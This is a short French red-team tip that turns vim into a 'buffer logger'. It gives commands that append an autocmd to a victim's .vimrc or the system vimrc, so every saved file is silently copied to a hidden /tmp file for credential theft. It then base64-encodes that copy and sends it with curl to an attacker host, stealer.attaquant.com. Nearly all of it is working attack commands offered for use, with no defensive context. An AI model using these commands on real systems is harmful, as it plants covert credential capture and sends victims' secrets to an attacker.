Astuce : vim comme keylogger

Ca n'est pas vraiment un keylogger plutôt un "buffer"-logger

Le redteamer chercher à voler des credz :

echo >> /home/victim/.vimrc
echo 'autocmd BufWritePost * :silent :w! >> /tmp/.vim-lock' >> /home/victim/.vimrc

Selon les droits, le chemin peut aussi être : /etc/vim/vimrc ou /etc/vimrc

Cible :

vim script-credz.sh

Au moment du ":w", /tmp/.vim-lock sera écrit avec le buffer de vim

L'attaquant sur la machine peut exfiltrer la sortie :

base64 /tmp/.vim-lock > /tmp/.vim-lock.1

curl -k -s -d @"/tmp/.vim-lock.1" "https://stealer.attaquant.com/"